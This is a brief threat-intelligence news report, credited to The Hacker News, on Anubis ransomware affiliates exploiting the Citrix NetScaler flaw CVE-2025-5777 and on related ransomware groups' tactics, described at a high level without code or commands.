Exploiting a Critical Citrix Vulnerability
Threat actors linked to the Anubis ransomware operation have been actively exploiting a critical authentication bypass flaw in Citrix NetScaler ADC and Gateway, tracked as CVE-2025-5777 with a CVSS score of 9.3. Arctic Wolf researchers reported that attackers are using this vulnerability, dubbed Citrix Bleed 2, to gain initial access to victim networks. The intrusions also involve valid VPN credentials, which may have been obtained from prior breaches or purchased from initial access brokers.
Blending In with Legitimate Tools
Once inside, affiliates of the Anubis ransomware-as-a-service group abuse legitimate remote monitoring and management tools such as ScreenConnect, Zoho Assist, and MeshAgent to maintain persistence and evade detection. Lateral movement is achieved through RDP and PsExec, followed by credential harvesting and deployment of data exfiltration tools like rclone and S3 Browser. The attackers also configure Cloudflare Tunnels to establish covert connections to compromised environments, all while disabling security software and clearing logs to hinder forensic analysis.
Broader Trends in Ransomware Tradecraft
Separately, researchers have detailed the tactics of The Gentlemen RaaS group, which employs a Go based backdoor for remote command execution and uses the bring your own vulnerable driver technique to disable endpoint security products. The group exploited a zero-day in a Kontron driver to gain kernel level access. In another development, the partnership between the VECT ransomware group and TeamPCP leverages credentials stolen from supply chain attacks on Trivy and LiteLLM to deploy ransomware at scale, marking an evolution in industrialized cybercrime.
Source: The Hacker News
